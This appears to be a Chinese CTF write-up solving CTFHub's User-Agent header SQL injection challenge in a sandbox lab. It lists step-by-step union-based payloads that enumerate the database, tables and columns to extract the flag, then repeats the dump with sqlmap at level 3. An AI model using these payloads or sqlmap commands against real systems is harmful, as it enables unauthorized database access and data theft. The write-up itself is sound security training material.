当前位置: 首页 > article >正文

CTFHUB技能树之SQL——UA注入

开启靶场,打开链接:

上来就是User-Agent报文头,说明是根据UA头的内容来进行查询的


用burp抓包发送到repeater中:

先判断是整数型注入还是字符型注入:

1 and 1=1#

正常回显

1 and 1=2#

回显错误,说明是整数型注入


(1)判断一下字段数

1 order by 2#

正常回显

1 order by 3#

回显错误,说明字段数是2


(2)查看数据库位置

1 union select 1,2#

看样子可能不在数据库中,老样子,改成-1 union select 1,2#

回显成功


(3)爆数据库名

-1 union select 1,database()#

得知数据库名是sqli


(4)爆表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

得知pffuearwed表和news表


(5)爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='pffuearwed'#

得知wdgoyxkhto列


(6)爆字段内容(flag)

-1 union select 1,group_concat(wdgoyxkhto) from sqli.pffuearwed#

成功得到flag:

ctfhub{2150a4e46775de6e0cbbcd0d}


用sqlmap试试:

python sqlmap.py -u "http://challenge-6dd6d0a2bde91c4c.sandbox.ctfhub.com:10800/" --level 3 --dbs

(这里因为是UA注入,所以需要将level调成3以上)


python sqlmap.py -u "http://challenge-6dd6d0a2bde91c4c.sandbox.ctfhub.com:10800/" -D sqli --level 3 --tables


python sqlmap.py -u "http://challenge-6dd6d0a2bde91c4c.sandbox.ctfhub.com:10800/" -D sqli -T pffuearwed --level 3 --dump

成功得到flag


http://www.kler.cn/a/355150.html

相关文章:

  • MySQL表名传参SP
  • C++ 杨辉三角 - 力扣(LeetCode)
  • Spark-Streaming容错语义
  • 成方金融科技后端部分笔试题 - 解析
  • el-form组件中的常用属性
  • OpenCV putText增加中文支持
  • 数字图像处理:图像分割应用
  • 什么!我上传的文件不见了?
  • Vue3状态管理
  • 4K分页机制相关介绍
  • 【C语言】循环结构-for循环
  • c++数据结构算法复习基础-- 5 -- 线性表-双向链表/双向循环链表-常用操作接口-复杂度分析
  • k3s安装指定版本以及离线安装(docker)
  • 多签机制简明理解及实例说明
  • GitHub每日最火火火项目(10.18)
  • 前端原型链:探索 JavaScript 中的继承奥秘
  • 宝塔下如何应对检测到存在待处理的恶意文件提醒
  • Android 通过计算器暗码启动应用
  • TCP/IP 协议【四次挥手】简要说明
  • oracle归档日志爆满问题处理
  • 遇到“mfc100u.dll丢失”的系统错误要怎么处理?科学修复mfc100u.dll
  • SAM应用:医学图像和视频中的任何内容分割中的基准测试与部署
  • 安卓-广播
  • 第J3-1周:DenseNet算法实现乳腺癌识别
  • spring-boot学习(2)
  • 从美的第二届远见者大会看AI与能源转型的未来